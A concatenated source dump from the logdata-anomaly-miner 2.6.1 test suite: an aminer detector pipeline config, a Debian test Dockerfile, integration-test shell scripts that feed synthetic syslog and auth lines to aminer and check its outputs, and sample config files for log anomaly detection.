service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filters = AtomFilters.SubhandlerFilter(None) analysis_context.register_component(atom_filters, component_name="AtomFilter") from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filters]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) # skipcq: BAN-B108 from aminer.events.Utils import VolatileLogarithmicBackoffEventHistory volatile_logarithmic_backoff_event_history = VolatileLogarithmicBackoffEventHistory(100) anomaly_event_handlers = [stream_printer_event_handler, volatile_logarithmic_backoff_event_history] analysis_context.register_component(volatile_logarithmic_backoff_event_history, component_name="VolatileLogarithmicBackoffEventHistory") # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filters.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filters.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filters.add_handler(allowlist_violation_detector) from aminer.analysis.ParserCount import ParserCount parser_count = ParserCount(analysis_context.aminer_config, None, anomaly_event_handlers, 10) analysis_context.register_component(parser_count, component_name="ParserCount") atom_filters.add_handler(parser_count) from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector ecd = EventCorrelationDetector(analysis_context.aminer_config, anomaly_event_handlers, check_rules_flag=True, hypothesis_max_delta_time=1.0, learn_mode=True) analysis_context.register_component(ecd, component_name="EventCorrelationDetector") atom_filters.add_handler(ecd) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filters.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector( analysis_context.aminer_config, ['/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=False, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filters.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filters.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filters.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filters.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter( sys.stdout, ['/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filters.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filters.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector new_match_id_value_combo_detector = NewMatchIdValueComboDetector( analysis_context.aminer_config, ['/model/type/path/name', '/model/type/syscall/syscall'], anomaly_event_handlers, id_path_list=['/model/type/path/id', '/model/type/syscall/id'], min_allowed_time_diff=5, learn_mode=True, allow_missing_values_flag=True, output_logline=True) analysis_context.register_component(new_match_id_value_combo_detector, component_name="NewMatchIdValueComboDetector") atom_filters.add_handler(new_match_id_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/Job Number', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=False) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filters.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=False, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filters.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filters.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule('CronJobAnnouncement', 5, 6, artefact_match_parameters=[ ('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filters.add_handler(time_correlation_violation_detector) from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/docker/000077500000000000000000000000001437606560100222545ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/docker/Dockerfile_deb000066400000000000000000000035201437606560100250600ustar00rootroot00000000000000# Pull base image. ARG vardistri FROM $vardistri ARG varbranch ENV BRANCH=$varbranch # Set local timezone ENV TZ=Europe/Vienna RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone LABEL maintainer="wolfgang.hotwagner@ait.ac.at" # Install necessary debian packages ARG DEBIAN_FRONTEND=noninteractive RUN apt-get update && apt-get install -y \ ansible \ git \ vim \ postfix \ procps \ cpulimit \ mailutils \ postfix \ rsyslog \ sudo \ curl \ apache2 \ locales \ locales-all RUN sed -i -e 's/# en_US.UTF-8 UTF-8/en_US.UTF-8 UTF-8/' /etc/locale.gen && \ dpkg-reconfigure --frontend=noninteractive locales && \ update-locale LANG=en_US.UTF-8 ENV LANG en_US.UTF-8 ENV LANGUAGE en_US:en ENV LC_ALL en_US.UTF-8 ADD scripts/distritest.sh /distritest.sh ADD . /opt/logdata-anomaly-miner RUN chmod 755 /distritest.sh RUN mkdir -p /opt/logdata-anomaly-miner/roles/aminer RUN echo varbranch $varbranch RUN cd /opt/logdata-anomaly-miner/roles && git clone -b $varbranch https://github.com/ait-aecid/aminer-ansible.git aminer RUN cd /opt/logdata-anomaly-miner && sed -e "s+{{SOURCEDIR}}+$PWD+g" /opt/logdata-anomaly-miner/.playbook.yml > /opt/logdata-anomaly-miner/playbook.yml RUN cd /opt/logdata-anomaly-miner && ansible-playbook playbook.yml RUN git clone -b $varbranch https://github.com/ait-aecid/logdata-anomaly-miner.wiki.git /opt/wiki RUN awk '/^```yaml$/ && ++n == 1, /^```$/' < /opt/wiki/Getting-started-\(tutorial\).md | sed '/^```/ d' | sed '/^```python/ d' > /home/aminer/gettingStarted-config.yml RUN ln -s /etc/aminer/conf-available/generic/ApacheAccessModel.py /etc/aminer/conf-enabled/ RUN echo "aminer ALL=(ALL) NOPASSWD:ALL" > /etc/sudoers.d/aminer USER aminer WORKDIR /home/aminer ENTRYPOINT ["/distritest.sh"] logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/000077500000000000000000000000001437606560100233305ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/aminerIntegrationTest.sh000077500000000000000000000052101437606560100302040ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ../testFunctions.sh . ./declarations.sh AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* LOGFILE=/tmp/syslog sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null echo "Integration test started.." echo "" CFG_PATH=/tmp/config.py if ! test -f "$CFG_PATH"; then echo "$CFG_PATH does not exist!" exit 1 fi time=`date +%s` #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $LOGFILE #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $LOGFILE #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $LOGFILE #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $LOGFILE #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $LOGFILE #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $LOGFILE #ADD HERE runAminerUntilEnd "sudo aminer --config $CFG_PATH" "$LOGFILE" "/var/lib/aminer/AnalysisChild/RepositioningData" "$CFG_PATH" "/tmp/output" checkAllOutputs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi exit 0 logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/aminerIntegrationTest2.sh000077500000000000000000000147321437606560100302770ustar00rootroot00000000000000#!/bin/bash #To add more log lines following positions must be changed: main script, checkAllOutputs, isExpectedOutput. The Position is marked with a "ADD HERE" comment. . ./declarations.sh NUMBER_OF_LOG_LINES=7 OUT=/tmp/output SYSLOG=/tmp/syslog AUTH=/tmp/auth.log AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null echo "Integration test started.." echo "" CFG_PATH21=/tmp/config21.py if ! test -f "$CFG_PATH21"; then echo "$CFG_PATH21 does not exist!" exit 1 fi CFG_PATH22=/tmp/config22.py if ! test -f "$CFG_PATH22"; then echo "$CFG_PATH22 does not exist!" exit 1 fi #< /dev/null & DOWNLOAD_PID=$! #start aminer sudo aminer --config $CFG_PATH21 > $OUT & PID=$! #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG sleep 1 #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 1 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 1 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 1 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH sleep 1 #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG sleep 1 #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH #ADD HERE #stop aminer sleep 3 sudo pkill -x aminer wait $PID checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then echo "" echo "all mails were found in the mailbox!" echo "finished test successfully.." else echo "" echo "test failed at checking mails.." exit 1 fi else echo "" echo "test failed at checking syslogs.." exit 1 fi else echo "" echo "test failed at checking outputs.." exit 1 fi echo "" echo "part 1 finished" echo "" #END AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $SYSLOG 2> /dev/null sudo rm $AUTH 2> /dev/null sudo rm $OUT 2> /dev/null sudo cp ../unit/data/kafka-client.conf /etc/aminer/kafka-client.conf wait $DOWNLOAD_PID tar xvf kafka.tgz > /dev/null rm kafka.tgz $KAFKA_VERSIONSTRING/bin/zookeeper-server-start.sh $KAFKA_VERSIONSTRING/config/zookeeper.properties > /dev/null & sleep 1 $KAFKA_VERSIONSTRING/bin/kafka-server-start.sh $KAFKA_VERSIONSTRING/config/server.properties > /dev/null & sleep 1 COUNTER=0 #start aminer sudo aminer -C --config $CFG_PATH22 -f > $OUT & PID=$! sleep 8 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") > $SYSLOG sleep 2 #New Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") > $AUTH sleep 2 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 2 #Anomaly FixedDataModel HD Repair ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrad") >> $AUTH sleep 2 #Anomaly DateTimeModel ({ date '+%m.%Y %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 2 #Known Path ({ date '+%Y-%m-%d %T' && cat /etc/hostname && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $AUTH sleep 2 #Known Path ({ date '+%Y-%m-%d %T' && echo 'fedora' && id -u -n | tr -d "\n" && echo :; } | tr "\n" " " && echo "System rebooted for hard disk upgrade") >> $SYSLOG sleep 2 #Root Home Path echo 'The Path of the home directory shown by pwd of the user root is: /root' >> $AUTH sleep 2 #User Home Path echo 'The Path of the home directory shown by pwd of the user user is: /home/user' >> $SYSLOG sleep 2 #Guest Home Path echo 'The Path of the home directory shown by pwd of the user guest is: /home/guest' >> $AUTH #ADD HERE #stop aminer sleep 12 sudo pkill -x aminer wait $PID sleep 3 # leave the kafka handler some time. result=0 checkAllOutputs if [ $? == 0 ]; then checkAllSyslogs if [ $? == 0 ]; then checkAllMails if [ $? == 0 ]; then checkKafkaTopic if [ $? == 0 ]; then echo "" echo "all kafka outputs were found!" echo "finished test successfully.." else echo "" echo "test failed at checking kafka topic.." result=1 fi else echo "" echo "test failed at checking mails.." result=1 fi else echo "" echo "test failed at checking syslogs.." result=1 fi else echo "" echo "test failed at checking outputs.." result=1 fi echo "" echo "part 2 finished" sudo $KAFKA_VERSIONSTRING/bin/kafka-server-stop.sh > /dev/null sudo $KAFKA_VERSIONSTRING/bin/zookeeper-server-stop.sh > /dev/null sudo rm -r $KAFKA_VERSIONSTRING/ sudo rm -r /tmp/zookeeper sudo rm -r /tmp/kafka-logs sudo rm /etc/aminer/kafka-client.conf exit $result logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/config.py000066400000000000000000000172271437606560100251600ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('DTM', b'%Y-%m-%d %H:%M:%S'), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HDRepair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('DiskUpgrade', service_children_disk_upgrade), SequenceModelElement('HomePath', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/HomePath/Username', '/model/HomePath/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name="MailHandler") anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/config21.py000066400000000000000000000202341437606560100253130ustar00rootroot00000000000000config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog', 'file:///tmp/auth.log'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 